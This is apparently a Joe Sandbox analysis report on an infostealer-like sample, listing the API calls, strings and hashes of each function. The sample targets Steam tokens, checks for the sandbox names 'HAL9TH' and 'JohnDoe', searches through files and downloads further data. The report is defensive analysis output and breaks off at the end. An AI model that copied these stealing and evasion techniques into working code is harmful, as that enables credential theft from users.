RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040E8D7
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040E8F3

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 9faebf2de75bf63b99fbadaceea92aed034a018285eddf57d64b14fdac7aec56
Instruction ID: 59302f8f08e84b6e53205e23179ccb4f2d667525b456669fd9439546fa12dc8f
Opcode Fuzzy Hash: 9faebf2de75bf63b99fbadaceea92aed034a018285eddf57d64b14fdac7aec56
Instruction Fuzzy Hash: A6F05E76640204FFEB149FA1EC0EFAE7A7EEB84B04F101025FB01A61A0D7B19911DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041086E Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 691COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410873

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,?,00424684,?,?,?,00000000,?,?,00424680,?,?,?), ref: 00410FD0

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00404D92: _EH_prolog.MSVCRT ref: 00404D97
Part of subcall function 00404D92: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DE6
Part of subcall function 00404D92: StrCmpCA.SHLWAPI(?), ref: 00404E00
Part of subcall function 00404D92: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E24
Part of subcall function 00404D92: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E45
Part of subcall function 00404D92: InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404E90
Part of subcall function 00404D92: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EAA
Part of subcall function 00404D92: InternetCloseHandle.WININET(00000000), ref: 00404EB1
Part of subcall function 00404D92: InternetCloseHandle.WININET(?), ref: 00404EBA

Part of subcall function 00404D92: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404E6C

Strings

E, xrefs: 00411177

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologInternetlstrcpy$CloseFileHandle$CreateOpenlstrcat$DirectoryReadWritelstrlen
String ID: E
API String ID: 2172055965-3568589458
Opcode ID: 4c0029da599ed2ac816204df3927d9b291426cbf73a4ffcbe4c4b9897c5ed7a5
Instruction ID: c4efe4efdfaad88b00d563889e55045131ebd4388e9f9190f6b0678513af584d
Opcode Fuzzy Hash: 4c0029da599ed2ac816204df3927d9b291426cbf73a4ffcbe4c4b9897c5ed7a5
Instruction Fuzzy Hash: 26626C31801288EADF05EBE6D955BDCBFB46F29308F1444AEE445732C2DB781B18DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00413071 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00413076

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

lstrlen.KERNEL32(00000000,00000000,?,00000000,004244AF), ref: 004130C7

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Strings

Soft\Steam\steam_tokens.txt, xrefs: 004130DF

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 40794102-3507145866
Opcode ID: 743da76c2615ec201a4711821d8736523bc6ee0fb9830f4043c332e24f7c49bd
Instruction ID: 314a9d3dfb88439be04f93f4e9330820655916160995adde9920049028c6f92b
Opcode Fuzzy Hash: 743da76c2615ec201a4711821d8736523bc6ee0fb9830f4043c332e24f7c49bd
Instruction Fuzzy Hash: BD213B71800158AACF04FBE6C956BDDBB78AF19308F10856EE411732D2DB782719CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401043 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 0040E683: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E68F
Part of subcall function 0040E683: HeapAlloc.KERNEL32(00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E696
Part of subcall function 0040E683: GetComputerNameA.KERNEL32(00000000,?), ref: 0040E6AA

Part of subcall function 0040E651: GetProcessHeap.KERNEL32(00000000,00000104,00000000,HAL9TH,?,00401063,JohnDoe,00415B49), ref: 0040E65D
Part of subcall function 0040E651: HeapAlloc.KERNEL32(00000000,?,00401063,JohnDoe,00415B49), ref: 0040E664
Part of subcall function 0040E651: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E678

ExitProcess.KERNEL32 ref: 00401070

Strings

JohnDoe, xrefs: 00401059
HAL9TH, xrefs: 00401043

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID: HAL9TH$JohnDoe
API String ID: 1004333139-3469431008
Opcode ID: c325a229e93f0b281faee4112369322461e72d20a9d288c4c314f514dd301ac1
Instruction ID: 2ef834e29eece2a673e7f1ed4b69fc1af26aeea72df36d94ee3d5202348ae326
Opcode Fuzzy Hash: c325a229e93f0b281faee4112369322461e72d20a9d288c4c314f514dd301ac1
Instruction Fuzzy Hash: 97D05E61A8474210ED3436B2780AD1612884C20768360093BB002F19C6ED7E8490006C

Uniqueness

Uniqueness Score: -1.00%

Function 00407147 Relevance: 4.7, APIs: 3, Instructions: 231stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040714C

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

lstrlen.KERNEL32(00000000), ref: 00407383
lstrlen.KERNEL32(00000000), ref: 00407397

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
String ID:
API String ID: 3193997572-0
Opcode ID: 686b5e08ec1518f19b5cfc0172cce503a6c00adae9226d5b486b1620cefd56ba
Instruction ID: 2db634f6e4f8391188817ca8b70ad80a656b740c6967db4882bbb68c6e89a19d
Opcode Fuzzy Hash: 686b5e08ec1518f19b5cfc0172cce503a6c00adae9226d5b486b1620cefd56ba
Instruction Fuzzy Hash: 34A18431804148EADF09EBE6D955BDDBBB4AF18308F54446EF405732C2DB782B18DB26

Uniqueness

Uniqueness Score: -1.00%

Function 00414F24 Relevance: 4.6, APIs: 3, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414F29

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

lstrcat.KERNEL32(?,00000000), ref: 00414F6B
lstrcat.KERNEL32(?), ref: 00414F8A

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00414CC7: _EH_prolog.MSVCRT ref: 00414CCC
Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414CEB
Part of subcall function 00414CC7: FindFirstFileA.KERNEL32(?,?), ref: 00414D02
Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,00424818), ref: 00414D1F
Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,0042481C), ref: 00414D39
Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D5D
Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,0042447E), ref: 00414D6E
Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D8B
Part of subcall function 00414CC7: PathMatchSpecA.SHLWAPI(?,?), ref: 00414DB2
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414DDE
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,00424834), ref: 00414DF0
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414E00
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,00424838), ref: 00414E12
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414E26

Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D9F
Part of subcall function 00414CC7: FindNextFileA.KERNEL32(00000000,?), ref: 00414EF6
Part of subcall function 00414CC7: FindClose.KERNEL32(00000000), ref: 00414F05

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 25485560-0
Opcode ID: 76738d678de347eee2deda178e4cc8441fbec7177bde9d722b48a22d7cd4c949
Instruction ID: 8b11b13a94d00ed0da9b1ac4add6904c7d1a8df66ed18ef339ef0f3182ba5d39
Opcode Fuzzy Hash: 76738d678de347eee2deda178e4cc8441fbec7177bde9d722b48a22d7cd4c949
Instruction Fuzzy Hash: 5741B171D00119ABCF10EFA1DC46EED7B79FF48314F00066AF940A2161E73997698B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA83 Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00413480), ref: 0040FA9B
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040FAB6
CloseHandle.KERNEL32(00000000), ref: 0040FABD

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: f8103156aad628352d265fe4394452c368a59e008b91e0c9a691aedd6324bf5a
Instruction ID: 9fa8da15bc1bd996d1c6d90f9597c2e1419af83dcafec2f5f0315d7c757bc199
Opcode Fuzzy Hash: f8103156aad628352d265fe4394452c368a59e008b91e0c9a691aedd6324bf5a
Instruction Fuzzy Hash: 52F03076901228BBDB20AB50DC09FD97B69AF04755F004061FA45A61D0DBB49A848BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E683 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E68F
HeapAlloc.KERNEL32(00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E696
GetComputerNameA.KERNEL32(00000000,?), ref: 0040E6AA

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: b83d286ff64a099836f19afa592c91b9195e3a8c7a744618c8208ad52fbd73d1
Instruction ID: 557862b87a92863bd0aefa927051c0b0989c03f65f9f1febeffc8aa881e0f0b8
Opcode Fuzzy Hash: b83d286ff64a099836f19afa592c91b9195e3a8c7a744618c8208ad52fbd73d1
Instruction Fuzzy Hash: FBE08CB1700204ABE7109BAAAC0DF9AB6ECEB84745F400036F602D2291DAB489018628

Uniqueness

Uniqueness Score: -1.00%

Function 0040A810 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A815

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0041086E: _EH_prolog.MSVCRT ref: 00410873

Part of subcall function 00406492: _EH_prolog.MSVCRT ref: 00406497
Part of subcall function 00406492: GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00423B74,?,?,?,00423B6F,00000000), ref: 00406554
Part of subcall function 00406492: SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00423B78,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00423B73), ref: 004065CC
Part of subcall function 00406492: LoadLibraryA.KERNEL32(00000000), ref: 004065E7

Part of subcall function 004093C1: _EH_prolog.MSVCRT ref: 004093C6
Part of subcall function 004093C1: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00423DD4,?,?,00423BD2,00000000), ref: 00409443
Part of subcall function 004093C1: StrCmpCA.SHLWAPI(?,00423DD8), ref: 00409460
Part of subcall function 004093C1: StrCmpCA.SHLWAPI(?,00423DDC), ref: 0040947A
Part of subcall function 004093C1: StrCmpCA.SHLWAPI(?,00000000,?,?,?,00423DE0,?,?,00423BD3), ref: 00409511

Part of subcall function 004066E4: FreeLibrary.KERNEL32(0040A9FA), ref: 004066EA

Strings

\..\, xrefs: 0040A8DB

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$EnvironmentFileLibraryVariablelstrcat$AttributesFindFirstFolderFreeLoadPathlstrlen
String ID: \..\
API String ID: 2661990186-4220915743
Opcode ID: 1baf731be5b712a8ee8592cc46acfd217d529db47b52e023e3d5594b4343f22a
Instruction ID: c9b8218839ee67037faa05465a27bbd49f7b352c94817c32eda783aedc932c4c
Opcode Fuzzy Hash: 1baf731be5b712a8ee8592cc46acfd217d529db47b52e023e3d5594b4343f22a
Instruction Fuzzy Hash: 4E616F71C01248EACB05FBE6C546BDDBFB86F18308F14446EE845732C2EB785718C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 00405D46 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E75), ref: 00405DC5

Strings

, xrefs: 00405D98

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: a9ca3820c71c3eda37ba079eb7877add819211e6f4f865b059153334e2d250ef
Instruction ID: cee62a71552f9d0dad0b6714305bc6c0a244a081a93a829b40d8518b33be5322
Opcode Fuzzy Hash: a9ca3820c71c3eda37ba079eb7877add819211e6f4f865b059153334e2d250ef
Instruction Fuzzy Hash: 3D115B7150190AEBEB60CF9485487ABB6A5FF04340F6084279942E22C0C7789A41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Strings

O<B, xrefs: 0040F7D0

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
